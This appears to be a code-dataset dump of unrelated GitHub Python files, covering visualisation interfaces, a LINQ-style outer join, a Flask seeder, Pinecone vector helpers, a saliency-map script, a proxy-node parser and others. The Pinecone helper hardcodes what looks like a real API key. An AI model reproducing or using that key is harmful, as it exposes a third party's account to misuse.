rv1: an instance of class inheriting from VizGraph interface.\n \"\"\"\n\n @abc.abstractmethod\n def render(self, filename: str) -> None:\n \"\"\"Render the graph as a file.\n\n Parameters\n ----------\n filename : str\n see the definition of implemented class.\n \"\"\"\n","repo_name":"apache/tvm","sub_path":"python/tvm/contrib/relay_viz/interface.py","file_name":"interface.py","file_ext":"py","file_size_in_byte":9816,"program_lang":"python","lang":"en","doc_type":"code","stars":10533,"dataset":"github-code","pt":"95"} +{"seq_id":"25722043421","text":"from ..Generators.RestartableGenerator import *\nfrom ..Types.Exceptions import *\n\nclass OuterJoin:\n \"\"\"\n outerJoin_: Correlates the elements of two sequences based on matching keys. If no matching record is find in the second sequence, None is sent to the output selector.\n Outer Joins are not provided in LINQ. This is a new function, following the pattern of join()\n optional equality comparer can be used to compare keys\n If the output selector is left out, results are returned as (first row, second row).\n\n >>> Enumerable outerJoin(Iterable second,\n Func firstKeySelector, Func secondKeySelector,\n Func? outputFunction = None, IEqualityComparer? comparer = None);\n >>> IEqualityComparer = (Predicate | { equals: Predicate });\n \"\"\"\n def outerJoin(self, second, firstKeySelector, secondKeySelector, outputFunction = None, comparer = None):\n if second is None:\n raise ArgumentNullException(\"Required argument is None\")\n if not firstKeySelector or not secondKeySelector:\n raise ArgumentNullException(\"Required argument is None\")\n\n if outputFunction:\n output = outputFunction\n else:\n # if function is missing, return tuple with (left, right)\n output = lambda l, r: (l, r)\n\n def _outerJoin(data):\n # Simple nested loops join\n # If this were SQL server, some analysis and pre-filtering could be done before comparison.\n # This isn't SQL Server. We can't even filter out NULLs, because what if the join function says \"left == null && right == null\", like some linq to entity queries do?\n\n # The right side can theoretically be a generator. We don't know, but we have to take that chance.\n # If it is a generator, it can't be restarted to allow that.\n rightGen = RestartableGenerator(second)\n\n for leftItem in data:\n leftMatched = False\n leftKey = firstKeySelector(leftItem)\n for rightItem in rightGen:\n rightKey = secondKeySelector(rightItem)\n match = False\n if comparer:\n match = comparer(leftKey, rightKey)\n else:\n match = leftKey == rightKey\n if match:\n leftMatched = True\n yield output(leftItem, rightItem)\n\n if not leftMatched:\n yield output(leftItem, None)\n\n rightGen.restart()\n\n return self._extend(_outerJoin)\n","repo_name":"hachiko-8ko/join-to-python","sub_path":"src/join_to_python/EnumerableType/OuterJoin.py","file_name":"OuterJoin.py","file_ext":"py","file_size_in_byte":2722,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"42621869022","text":"import os\nfrom app import db\nfrom app.models import Item, Category\n\n# run flask commands to create app.db\nos.system('flask db init')\nos.system('flask db migrate -m \\\"items table\\\"')\nos.system('flask db upgrade')\n\n# fill app.db with some initial items\nbase_list = [\n {\n \"category\":'UNCATEGORIZED',\n \"item\":'popcorn'\n },\n {\n \"category\":'PRODUCE',\n \"item\":'apple'\n },\n {\n \"category\":'DAIRY / EGGS',\n \"item\":'cheese'\n },\n]\n\nfor item in base_list:\n c = Category(name=item['category'])\n db.session.add(c)\n db.session.commit()\n\n i = Item(name=item['item'], category_id=c.id)\n db.session.add(i)\n db.session.commit()\n\n\nprint('Added initial list:')\nfor db_item in Item.query.all():\n print(db_item, db_item.category)\n\nprint(\"\\nDo you want to create some initial items? (Y or N)\")\nwhile True:\n \n user_input = input(\">> \")\n\n if user_input[0].lower() == 'y':\n item_name = input(\"\\nEnter the name of an item: \")\n item = Item(name=item_name)\n db.session.add(item)\n db.session.commit()\n print(f\"\\nAdded {item}\")\n print(\"\\nAdd another? (Y or N)\")\n \n elif user_input[0].lower() == 'n':\n break\n \n else:\n print(\"\\nPlease enter valid input\")\n print(\"\\tY or N\")\n","repo_name":"kylehorton33/vue-flask-grocery","sub_path":"server/create_db.py","file_name":"create_db.py","file_ext":"py","file_size_in_byte":1205,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"36327104936","text":"import argparse\nimport csv\nimport re\nimport sys\n\n__author__ = 'Martin Rosellen'\n__docformat__ = \"restructuredtext en\"\n\n\ndef main(argv):\n parser = argparse.ArgumentParser(description='Creates a control csv file in preparation for plotting '\n 'interaction energies with DrawInteractions.py.')\n parser.add_argument('hbonds', help='hbonds_consol.csv')\n parser.add_argument('fdmmpbsa', help='FINAL_DECOMP_MMPBSA_table.csv')\n parser.add_argument('output', help='output file (CSV)')\n parser.add_argument('-m', '--mapping', help='mapping file for residue numbers and chains')\n parser.add_argument('-c', '--column_order', nargs='?', help='Assign chains to columns (e.g. \\'-c CA\\' -> C first, '\n 'A second column)')\n args = parser.parse_args()\n\n entries = []\n\n with open(args.hbonds, 'r') as fo:\n for line in fo:\n entries.append(line[0:7])\n entries.append(line[8:15])\n entries = list(set(entries))\n\n with open(args.fdmmpbsa, 'r') as fo:\n head = fo.readline()\n head = head.strip()\n head = head.split(',')\n head = head[1:]\n\n entries.extend(head)\n\n # remove duplicates\n entries = list(set(entries))\n\n out_lines = []\n with open(args.mapping, 'r') as f:\n mapping = csv.DictReader(f)\n mapping = dict((row['from'], [row['to'], row['chain']]) for row in mapping)\n\n if args.column_order:\n column_order = args.column_order.replace(' ', '')\n else:\n column_order = ''.join(set([item[1] for item in mapping.values()]))\n\n # assign residues to columns\n for entry in entries:\n resnum = re.findall(r'\\d+', entry)[0]\n residue = mapping[resnum][0]\n chain = mapping[resnum][1]\n column = str(column_order.index(chain) + 1)\n out_lines.append(column + \",\" + entry + \",\" + residue + \",\" + chain + \",Hydro\")\n\n out_lines = sorted(out_lines)\n\n with open(args.output, 'w') as out:\n out.writelines(\"Col,Id,Legend,Chain,Fill\" + '\\n')\n for line in out_lines:\n out.writelines(line + '\\n')\n\n\nif __name__ == \"__main__\":\n main(sys.argv)\n","repo_name":"williamdlees/AmberUtils","sub_path":"CreateInteractionControl.py","file_name":"CreateInteractionControl.py","file_ext":"py","file_size_in_byte":2233,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"95"} +{"seq_id":"42449474865","text":"from tornado import web\n\nfrom .. import RequestHandler\n\nclass ServersInfoHandler(RequestHandler):\n def initialize(self, server_processes):\n self.server_processes = server_processes\n\n @web.authenticated\n async def get(self):\n data = []\n # Pick out and send only metadata\n # Don't send anything that might be a callable, or leak sensitive info\n for sp in self.server_processes:\n # Manually recurse to convert namedtuples into JSONable structures\n data.append({\n 'name': sp.get('name', 'Unknown')\n })\n\n self.write({'server_processes': data})\n","repo_name":"QPod/qpod-hub","sub_path":"qpod/proxy/handlers.py","file_name":"handlers.py","file_ext":"py","file_size_in_byte":638,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"95"} +{"seq_id":"41841486476","text":"import pinecone, os \n\npinecone.init( \n\tapi_key=\"51a4ed09-15b8-4222-8e46-e9d5a67c78fa\", \n\tenvironment='gcp-starter' \n) \nindex = pinecone.Index('lawyer-info')\n\ndef insert(name, vector):\n index.upsert([\n \n (name, vector)\n\n ])\n\ndef get(vector):\n return index.query(\n vector=[vector],\n top_k=20,\n include_values=True\n )\n \n\n# insert(\"Tanay Desai\", [0.39465588331222534])\n# print(get([0.39465588331222534]))","repo_name":"Sarid10/DataHack_2_Ctrl-Alt-Defeat","sub_path":"Frontend/operations/db_operations.py","file_name":"db_operations.py","file_ext":"py","file_size_in_byte":444,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"10562247181","text":"\n#IMPORTS\nimport cv2\nimport torch\nimport torchvision\nimport torchvision.transforms as T\nimport numpy as np\nimport matplotlib.pyplot as plt\n# from torchsummary import summary\nimport requests\nfrom PIL import Image\nimport h5py\ngame = h5py.File('tj/h5_dataset/a.h5', 'r')\n\n#Using VGG-19 pretrained model for image classification\nmodel = torch.hub.load('pytorch/vision:v0.6.0', 'googlenet', pretrained=True)\n\n# model = torchvision.models.vgg19(pretrained=True)\nfor param in model.parameters():\n param.requires_grad = False\n\ndef download(url,fname):\n response = requests.get(url)\n with open(fname,\"wb\") as f:\n f.write(response.content)\n \n# Downloading the image \n# download(\"https://specials-images.forbesimg.com/imageserve/5db4c7b464b49a0007e9dfac/960x0.jpg?fit=scale\",\"input.jpg\")\n\n# Opening the image\n# img = Image.open('input.jpg') \n\n\n# Preprocess the image\ndef preprocess(image, size=224):\n transform = T.Compose([\n T.Resize(256),\n T.CenterCrop(224),\n T.ToTensor(),\n T.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]),\n ])\n return transform(image)\n\n'''\n Y = (X - μ)/(σ) => Y ~ Distribution(0,1) if X ~ Distribution(μ,σ)\n => Y/(1/σ) follows Distribution(0,σ)\n => (Y/(1/σ) - (-μ))/1 is actually X and hence follows Distribution(μ,σ)\n'''\ndef deprocess(image):\n transform = T.Compose([\n T.Lambda(lambda x: x[0]),\n T.Normalize(mean=[0, 0, 0], std=[4.3668, 4.4643, 4.4444]),\n T.Normalize(mean=[-0.485, -0.456, -0.406], std=[1, 1, 1]),\n T.ToPILImage(),\n ])\n return transform(image)\n\ndef show_img(PIL_IMG):\n plt.imshow(np.asarray(PIL_IMG))\n\n\ncapture_ori = cv2.VideoCapture('/home/lol/highlight_360.mp4')\ncapture_ori.set(cv2.CAP_PROP_POS_FRAMES,25010)\nfor pic_num in range(3500,int(capture_ori.get(cv2.CAP_PROP_FRAME_COUNT))):\n ret, frame = capture_ori.read()\n capture_ori_convert = cv2.cvtColor(frame,cv2.COLOR_BGR2RGB)\n capture_ori_pil = Image.fromarray(capture_ori_convert)\n\n input_tensor = preprocess(capture_ori_pil)\n print('tensor :', input_tensor.shape)\n\n input_batch = input_tensor.unsqueeze(0)\n print(input_batch.shape)\n\n # cv2.imshow('sex', input_tensor)\n\n break\n\n# preprocess the image\n# X = preprocess(input_batch[0])\n# we would run the model in evaluation mode\nmodel.eval()\n\n# we need to find the gradient with respect to the input image, so we need to call requires_grad_ on it\ninput_batch.requires_grad_()\n\n'''\nforward pass through the model to get the scores, note that VGG-19 model doesn't perform softmax at the end\nand we also don't need softmax, we need scores, so that's perfect for us.\n'''\n\nscores = model(input_batch)\n\n# Get the index corresponding to the maximum score and the maximum score itself.\nscore_max_index = scores.argmax()\nscore_max = scores[0,score_max_index]\n\n'''\nbackward function on score_max performs the backward pass in the computation graph and calculates the gradient of \nscore_max with respect to nodes in the computation graph\n'''\nscore_max.backward()\n\n'''\nSaliency would be the gradient with respect to the input image now. But note that the input image has 3 channels,\nR, G and B. To derive a single class saliency value for each pixel (i, j), we take the maximum magnitude\nacross all colour channels.\n'''\nsaliency, _ = torch.max(input_batch.grad.data.abs(),dim=1)\n\n# code to plot the saliency map as a heatmap\nfig=plt.figure(figsize=(100, 200))\nfig.add_subplot(1, 3, 1)\nplt.imshow(input_tensor[0])\nfig.add_subplot(1, 3, 2)\nimg = Image.open('s.jpg') \n# img = T.functional.crop(img, 50, 50, 290, 770)\nnewnew =T.Compose([\n T.Resize((240, 426)),\n T.ToTensor(),\n ])\nframe = newnew(img)\nprint('asdfadfadfasfd', frame.shape)\nframe=frame[:, 25:145, 25:385]\nprint('aewf', frame.shape)\nprint(type(frame))\ntorchvision.utils.save_image(frame, \"/home/lol/Desktop/a.jpg\")\n# farme.save_image\nexit()\ncv2.imshow('a', frame)\nfig.add_subplot(1, 3, 3)\n\nplt.imshow(saliency[0], cmap=plt.cm.hot)\n# plt.axis('off')\nplt.show()","repo_name":"cjsjyh/lol_highlight_ai","sub_path":"model/evaluation/saliency_map.py","file_name":"saliency_map.py","file_ext":"py","file_size_in_byte":4051,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"3247306017","text":"# Advent of Code 2022: Day 18\n\n\ndef neighbors(cord):\n x = cord[0]\n y = cord[1]\n z = cord[2]\n\n return [[x-1, y, z], [x+1, y, z],\n [x, y-1, z], [x, y+1, z],\n [x, y, z-1], [x, y, z+1]]\n\n\nif __name__ == '__main__':\n with open('data/input-18.txt') as f:\n puzzle_input = f.read().splitlines()\n\n cords_list = [list(map(int, line.split(','))) for line in puzzle_input]\n\n empty_sides = 0\n for cord in cords_list:\n empty_sides += len([point for point in neighbors(cord) if point not in cords_list])\n\n # Part 1\n print(f\"Part 1: {empty_sides}\")\n\n # Part 2\n min_x = min(x[0] for x in cords_list) - 1\n max_x = max(x[0] for x in cords_list) + 1\n min_y = min(x[1] for x in cords_list) - 1\n max_y = max(x[1] for x in cords_list) + 1\n min_z = min(x[2] for x in cords_list) - 1\n max_z = max(x[2] for x in cords_list) + 1\n\n outside_cubes = [[min_x, min_y, min_z]]\n visited = []\n while outside_cubes:\n this_cube = outside_cubes.pop()\n visited.append(this_cube)\n\n adj_cords = neighbors(this_cube)\n for test_cord in adj_cords:\n if (min_x <= test_cord[0] <= max_x) and (min_y <= test_cord[1] <= max_y) and (min_z <= test_cord[2] <= max_z):\n if test_cord not in visited and test_cord not in cords_list:\n outside_cubes.append(test_cord)\n\n outside_surface = 0\n for cord in cords_list:\n outside_surface += len([neigh for neigh in neighbors(cord) if neigh in visited])\n\n print(f\"Part 2: {outside_surface}\")\n\n","repo_name":"RyanWhitcomb-VT/advent_of_code_2022","sub_path":"day18.py","file_name":"day18.py","file_ext":"py","file_size_in_byte":1564,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"15611947459","text":"from model import *\nfrom torch.utils.data import DataLoader, random_split\nfrom parse import *\nimport argparse\nimport wandb\nimport matplotlib\nimport matplotlib.pyplot as plt\nfrom tqdm import tqdm\nfrom copy import deepcopy\nfrom sklearn.metrics import f1_score\ng = torch.Generator()\ng.manual_seed(26)\n\n\ndef plot(\n pitch_lst: List[int],\n onset_lst: List[int],\n ax: matplotlib.axes.Axes,\n title: str = None\n):\n segments = []\n for i, v in enumerate(pitch_lst):\n if ID2PITCH[v] == '':\n continue\n pitch = piano_key2midi_id(ID2PITCH[v])\n segments += [((i, pitch), (i+1, pitch))]\n ax.add_collection(LineCollection(segments))\n \n for i, x in enumerate(onset_lst):\n if x == 0:\n continue\n pitch = piano_key2midi_id(ID2PITCH[pitch_lst[i]])\n ax.vlines(i, pitch-0.5, pitch+0.5, color='r' if 'pred' in title else 'g', alpha=0.9, linestyle='solid')\n \n ax.autoscale()\n m = ax.get_yticks().tolist()\n for i in range(len(m)):\n m[i] = midi_id2piano_key(int(m[i]))\n ax.set_yticklabels(m)\n ax.set_title(title)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n # ViT-extractor\n parser.add_argument('--image_size', type=int, default=512)\n parser.add_argument('--patch_size', type=int, default=2)\n parser.add_argument('--num_classes', type=int, default=1000)\n parser.add_argument('--dim', type=int, default=256)\n parser.add_argument('--depth', type=int, default=3)\n parser.add_argument('--heads', type=int, default=16)\n parser.add_argument('--mlp_dim', type=int, default=256)\n parser.add_argument('--dropout', type=float, default=0.2)\n parser.add_argument('--out_dim', type=int, default=512)\n parser.add_argument('--extractor_name', type=str, default=None)\n parser.add_argument('--hidden_size', type=int, default=None)\n # training\n parser.add_argument('--max_epochs', type=int, default=100)\n parser.add_argument('--opt_name', type=str, default='AdamW')\n parser.add_argument('--lr', type=float, default=5e-5)\n parser.add_argument('--loss_alpha', type=float, default=0.5)\n # transformer\n parser.add_argument('--is_causal', type=bool, default=False)\n parser.add_argument('--nhead', type=int, default=8)\n parser.add_argument('--num_layers', type=int, default=4)\n # rnn\n parser.add_argument('--rnn_type', type=str, default=None)\n parser.add_argument('--bidirectional', type=bool, default=False)\n # misc\n parser.add_argument('--comment', type=str, default=None)\n parser.add_argument('--debug', type=bool, default=False)\n parser.add_argument('--project_name', type=str, default='MTTLead')\n parser.add_argument('--dataset_length', type=int, default=5000)\n args = parser.parse_args()\n args.dataset_length = TOT_TRACK\n print(args)\n config = vars(args)\n \n if args.num_layers == 2:\n pitch_ckpt = '/root/mtt/ckpt/MTTLeadPitchMMMRetrain/aymgyy5c/checkpoints/epoch=19-step=64000.ckpt'\n onset_ckpt = '/root/mtt/ckpt/MTTLeadOnsetMMMRetrain/ub4g9z64/checkpoints/epoch=19-step=64000.ckpt'\n elif args.num_layers == 4:\n pitch_ckpt = '/root/mtt/ckpt/MTTLeadPitchMMMRetrain/bvgo5p4s/checkpoints/epoch=19-step=64000.ckpt'\n onset_ckpt = '/root/mtt/ckpt/MTTLeadOnsetMMMRetrain/c2nkrark/checkpoints/epoch=19-step=64000.ckpt'\n \n wandb.init(\n entity='gariscat',\n project='MTTLeadJointInferenceMMM',\n )\n device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n pitch_config = deepcopy(config)\n pitch_config['num_layers'] = 3\n pitch_model = LeadModel.load_from_checkpoint(\n pitch_ckpt,\n config=config,\n loss_alpha=1\n ).to(device)\n onset_config = deepcopy(config)\n onset_config['num_layers'] = 1\n onset_model = LeadModel.load_from_checkpoint(\n onset_ckpt,\n config=config,\n loss_alpha=0,\n ).to(device)\n \n pitch_model.eval()\n onset_model.eval()\n \n dataset = LeadNoteDataset(length=args.dataset_length)\n \n train_set, val_set = random_split(dataset, [0.8, 0.2], generator=g)\n # train_loader = DataLoader(dataset=train_set, batch_size=1,)\n val_loader = DataLoader(dataset=val_set, batch_size=1,)\n \n print(ID2PITCH)\n \n all_onset_gt = []\n all_onset_pred = []\n all_pitch_gt = []\n all_pitch_pred = []\n \n for batch in tqdm(val_loader):\n pitch_gt, onset_gt, mel_left, mel_right, json_path = batch\n mel_tensor = torch.cat((mel_left, mel_right), dim=1).to(device)\n \n pitch_logits, _ = pitch_model.forward(mel_tensor)\n _, onset_logits = onset_model.forward(mel_tensor)\n \n pitch_pred = pitch_logits.argmax(-1)\n onset_pred = onset_logits.argmax(-1)\n \n pitch_gt = pitch_gt.flatten().numpy().tolist()\n onset_gt = onset_gt.flatten().numpy().tolist()\n pitch_pred = pitch_pred.detach().cpu().flatten().numpy().tolist()\n onset_pred = onset_pred.detach().cpu().flatten().numpy().tolist()\n \n # validate the notes\n \n L = len(pitch_gt)\n \n for i in range(L):\n if onset_pred[i]:\n if pitch_pred[i] == 0:\n onset_pred[i] = 0\n else:\n if pitch_pred[i]:\n if i == 0 or pitch_pred[i-1] != pitch_pred[i]:\n pitch_pred[i] = 0\n \n # plot\n \n fig, axes = plt.subplots(nrows=2, ncols=1, sharex=True)\n plot(pitch_gt, onset_gt, axes[0], 'ground truth')\n plot(pitch_pred, onset_pred, axes[1], 'prediction')\n plt.suptitle(json_path)\n \n # log\n \n buf = io.BytesIO()\n fig.savefig(buf)\n buf.seek(0)\n img = Image.open(buf)\n # print(type(img))\n img = wandb.Image(img)\n # print(type(img))\n wandb.log({\"joint_inference_samples\": img})\n plt.close()\n \n all_onset_gt += onset_gt\n all_onset_pred += onset_pred\n all_pitch_gt += pitch_gt\n all_pitch_pred += pitch_pred\n \n \n # calculate the metrics\n \n onset_f1 = f1_score(np.array(all_onset_gt), np.array(all_onset_pred))\n pitch_f1 = f1_score(np.array(all_pitch_gt), np.array(all_pitch_pred), average='macro')\n print(\"onset_f1:\", onset_f1)\n print(\"pitch_f1:\", pitch_f1)","repo_name":"Gariscat/mtt","sub_path":"joint_infer.py","file_name":"joint_infer.py","file_ext":"py","file_size_in_byte":6394,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"94"} +{"seq_id":"35728458842","text":"import json\r\nfrom renderapi.errors import RenderError\r\nfrom renderapi.transform.leaf import load_leaf_json\r\n__all__ = [\r\n 'TransformList',\r\n 'ReferenceTransform',\r\n 'InterpolatedTransform',\r\n 'load_transform_json']\r\n\r\n\r\nclass TransformList:\r\n \"\"\"A list of Transforms\r\n\r\n Attributes\r\n ----------\r\n tforms : :obj:`list` of :class:`Transform`\r\n transforms to apply\r\n transformId : str, optional\r\n uniqueId for this TransformList\r\n \"\"\"\r\n\r\n def __init__(self, tforms=None, transformId=None, json=None):\r\n \"\"\"Initialize TransformList\r\n\r\n Parameters\r\n ----------\r\n tforms : :obj:`list` of :class:`Transform`\r\n transforms to apply\r\n transformId : str, optional\r\n uniqueId for this TransformList\r\n json : dict, optional\r\n json compatible dictionary to create\r\n :class:`TransformList` via :method:`from_dict`\r\n (will supersede tforms and transformId if not None)\r\n \"\"\"\r\n if json is not None:\r\n self.from_dict(json)\r\n else:\r\n if tforms is None:\r\n self.tforms = []\r\n else:\r\n if not isinstance(tforms, list):\r\n raise RenderError(\r\n 'unexpected type {} for transforms!'.format(\r\n type(tforms)))\r\n self.tforms = tforms\r\n self.transformId = transformId\r\n\r\n def to_dict(self):\r\n \"\"\"serialization function\r\n\r\n Returns\r\n -------\r\n dict\r\n json & render compatible representation of this TransformList\r\n \"\"\"\r\n d = {}\r\n d['type'] = 'list'\r\n d['specList'] = [tform.to_dict() for tform in self.tforms]\r\n if self.transformId is not None:\r\n d['id'] = self.transformId\r\n return d\r\n\r\n def to_json(self):\r\n \"\"\"serialization function\r\n\r\n Returns\r\n -------\r\n str\r\n string representation of the json & render\r\n representation of this TransformList\r\n \"\"\"\r\n return json.dumps(self.to_dict())\r\n\r\n def from_dict(self, d):\r\n \"\"\"deserialization function\r\n\r\n Parameters\r\n ----------\r\n d : dict\r\n json compatible dictionary representation of this TransformList\r\n \"\"\"\r\n self.tforms = []\r\n if d is not None:\r\n self.transformId = d.get('id')\r\n for td in d['specList']:\r\n self.tforms.append(load_transform_json(td))\r\n return self.tforms\r\n\r\n\r\nclass InterpolatedTransform:\r\n \"\"\"Transform spec defined by linear interpolation of\r\n two other transform specs\r\n\r\n Attributes\r\n ----------\r\n a : :class:`Transform` or :class:`TransformList` or :class:`InterpolatedTransform`\r\n transform at minimum weight\r\n b : :class:`Transform` or :class:`TransformList` or :class:`InterpolatedTransform`\r\n transform at maximum weight\r\n lambda_ : float\r\n value in interval [0.,1.] which defines evaluation of the\r\n linear interpolation between a (at 0) and b (at 1)\r\n \"\"\" # noqa: E501\r\n\r\n def __init__(self, a=None, b=None, lambda_=None, json=None):\r\n \"\"\"Initialize InterpolatedTransform\r\n\r\n Parameters\r\n ----------\r\n a : :class:`Transform` or :class:`TransformList`\r\n or :class:`InterpolatedTransform`\r\n transform at minimum weight\r\n b : :class:`Transform` or :class:`TransformList`\r\n or :class:`InterpolatedTransform`\r\n transform at maximum weight\r\n lambda_ : float\r\n value in interval [0.,1.] which defines evaluation of the\r\n linear interpolation between a (at 0) and b (at 1)\r\n json : dict\r\n json compatible representation of this transform to\r\n initialize via :method:`self.from_dict`\r\n (will supersede a, b, and lambda_ if not None)\r\n \"\"\"\r\n if json is not None:\r\n self.from_dict(json)\r\n else:\r\n self.a = a\r\n self.b = b\r\n self.lambda_ = lambda_\r\n\r\n def to_dict(self):\r\n \"\"\"serialization routine\r\n Returns\r\n -------\r\n dict\r\n json compatible representation\r\n \"\"\"\r\n return dict(self)\r\n\r\n def from_dict(self, d):\r\n \"\"\"deserialization routine\r\n Parameters\r\n ----------\r\n d : dict\r\n json compatible representation\r\n \"\"\"\r\n self.a = load_transform_json(d['a'])\r\n self.b = load_transform_json(d['b'])\r\n self.lambda_ = d['lambda']\r\n\r\n def __iter__(self):\r\n return iter([('type', 'interpolated'),\r\n ('a', self.a.to_dict()),\r\n ('b', self.b.to_dict()),\r\n ('lambda', self.lambda_)])\r\n\r\n\r\nclass ReferenceTransform:\r\n \"\"\"Transform which is simply a reference to a transform stored elsewhere\r\n Attributes\r\n ----------\r\n refId : str\r\n transformId of the referenced transform\r\n \"\"\"\r\n\r\n def __init__(self, refId=None, json=None):\r\n \"\"\"Initialize ReferenceTransform\r\n Parameters\r\n ----------\r\n refId : str\r\n transformId of the referenced transform\r\n json : dict\r\n json compatible representation of this transform\r\n (will supersede refId if not None)\r\n \"\"\"\r\n if json is not None:\r\n self.from_dict(json)\r\n else:\r\n self.refId = refId\r\n\r\n def to_dict(self):\r\n \"\"\"serialization routine\r\n Returns\r\n -------\r\n dict\r\n json compatible representation of this transform\r\n \"\"\"\r\n d = {}\r\n d['type'] = 'ref'\r\n d['refId'] = self.refId\r\n return d\r\n\r\n def from_dict(self, d):\r\n \"\"\"deserialization routine\r\n Parameters\r\n ----------\r\n d : dict\r\n json compatible representation of this transform\r\n \"\"\"\r\n self.refId = d['refId']\r\n\r\n def __str__(self):\r\n return 'ReferenceTransform(%s)' % self.refId\r\n\r\n def __repr__(self):\r\n return self.__str__()\r\n\r\n def __iter__(self):\r\n return iter([('type', 'ref'), ('refId', self.refId)])\r\n\r\n\r\ndef load_transform_json(d, default_type='leaf'):\r\n \"\"\"function to get the proper deserialization function\r\n\r\n Parameters\r\n ----------\r\n d : dict\r\n json compatible representation of Transform\r\n default_type : str\r\n what kind of transform should we assume this\r\n if it is not specified in 'type' ('leaf','list','ref','interpolated')\r\n\r\n Returns\r\n -------\r\n renderapi.transform.Transform\r\n deserialized transformation using the most appropriate class\r\n\r\n Raises\r\n ------\r\n RenderError\r\n if d['type'] isn't one of ('leaf','list','ref','interpolated')\r\n \"\"\"\r\n handle_load_tform = {'leaf': load_leaf_json,\r\n 'list': lambda x: TransformList(json=x),\r\n 'ref': lambda x: ReferenceTransform(json=x),\r\n 'interpolated':\r\n lambda x: InterpolatedTransform(json=x)}\r\n try:\r\n return handle_load_tform[d.get('type', default_type)](d)\r\n except KeyError as e:\r\n raise RenderError('Unknown Transform Type {}'.format(e))\r\n","repo_name":"AllenInstitute/render-python","sub_path":"renderapi/transform/transform.py","file_name":"transform.py","file_ext":"py","file_size_in_byte":7388,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"94"} +{"seq_id":"71838277110","text":"\nimport random \nimport yaml\n\nimport co6co.utils as utils \nfrom .nodeLink import * \nfrom .node import *\nfrom co6co.utils import log\nfrom typing import List\n \n \ndef _getName(name)->str:\n '''\n 取出空白,为None 随机名字\n '''\n name=name.strip() if name else None\n if name ==None: f\"未知_{random.randrange(1,100000)}\"\n pattern=\"\\s+\"\n return re.sub(pattern,'',name)\n\"\"\"\nyaml 文件 解析\n\"\"\"\ndef _parseYaml(yamlContent): # 解析yaml文本\n '''\n 解析yaml 文本\n 生成 Nodes节点\n '''\n try:\n yml = yaml.load(yamlContent, Loader=yaml.FullLoader) \n tmp_list = []\n # clash新字段\n if yml.get('proxies'):tmp_list = yml.get('proxies')\n # clash旧字段\n elif yml.get('Proxy'):tmp_list = yml.get('Proxy')\n else:log.warn('clash节点提取失败,clash节点为空') \n return _parseYamlNode(tmp_list) \n except:\n raise\ndef _parseYamlNode(nodes:list):\n '''\n 解析Yaml文件中的node 节点\n nodes: yaml.get('proxies') 或者 yaml.get('Proxy')\n return :nodes 基本上也是返回 参数,仅作整理过滤\n '''\n nodes_list = []\n for node in nodes:\n node['name'] = _getName( node['name'])\n node['server']=node['server'].strip()\n # 对clashR的支持\n if node.get('protocolparam'):\n node['protocol-param'] = node['protocolparam']\n del node['protocolparam']\n if node.get('obfsparam'):\n node['obfs-param'] = node['obfsparam']\n del node['obfsparam']\n node['udp'] = True\n node['port'] = int(node['port']) \n\n if node.get('name')==None: continue\n nodes_list.append(node)\n return nodes_list\n\n\"\"\"\ntext 文件 解析\n\"\"\"\ndef _parseNodeText(text:str| bytes): # 解析 从 base64 解析出来的文本 \n '''\n text: b64decode 解析出来的文本\n 解析节点\n '''\n text_list = text.splitlines()\n \n #if type(text) == str: text_list=[itm.encode(\"utf-8\") for itm in text_list] \n return parser(text_list)\n\ndef parser(nodeUrls: List[str] | List[bytes])->List[dict]|None: \n nodes_list= []\n for node in nodeUrls: \n if type(node) == str: node =node.encode(\"utf-8\") \n try:\n print(node)\n denode=None\n toClashNode=None\n if is_vmess_node(node): \n denode=decode_v2ray_node\n toClashNode=v2ray_to_clash\n elif is_ss_node(node):\n denode = decode_ss_node \n toClashNode=ss_to_clash \n elif is_ssr_node(node):\n denode = decode_ssr_node \n toClashNode=ssr_to_clash \n\n elif is_trojan_node(node):\n denode= decode_trojan_node \n toClashNode=trojan_to_clash \n else:\n continue \n tmp_node = denode(node) \n clash_node = toClashNode(tmp_node)\n clash_node['name'] = _getName(clash_node['name'])\n nodes_list.append(clash_node)\n except Exception as e:\n log.err(f'节点转换出错:\"{node}\",{e}') \n continue \n if len(nodes_list) > 0: return nodes_list\n else: return None\n \ndef __check(nodesContent:str)->list|dict|str:\n try:\n yamlData=yaml.full_load(nodesContent)\n return yamlData\n except:\n return nodesContent\n \ndef parser_content(nodesContent:str)->List[dict]:\n \"\"\"\n 解析文本为 clash节点s\n \"\"\" \n nodes_list = [] \n try: \n # \n yamlData =__check(nodesContent) \n if type (yamlData) == dict: #yaml 格式\n #log.succ(f\"{type(yamlData)}’yaml dict‘<--{addr}\")\n nodes_list=_parseYaml(nodesContent)\n elif type (yamlData) == list and type(yamlData[0]) == dict: #yaml 格式中的节点\n #log.succ(f\"{type(yamlData)} ’yaml list dict‘<--{addr}\")\n nodes_list=_parseYamlNode(yamlData)\n else: # base64加密 or node list\n #og.succ(f\"{type(yamlData)} ’TEXT‘<--{addr}\")\n # base64 需要解密后内容 \n rawTxt = base64.b64decode(nodesContent) if utils.isBase64(nodesContent) else nodesContent \n #log.err(f\"{type(rawTxt)},\\n{rawTxt}\") \n nodes_list=_parseNodeText(rawTxt)\n except Exception as e: \n log.err(f'[-]解析节点失败:\"{e}\"' ) \n return nodes_list\n\n\n","repo_name":"co6co/py","sub_path":"clash/co6co_clash/nodes.py","file_name":"nodes.py","file_ext":"py","file_size_in_byte":4412,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"41298103836","text":"# -*- coding: utf-8 -*-\nimport math\n\nm=int(input('Digite a quantidade de listas: '))\nn=int(input('Digite a quantidade de 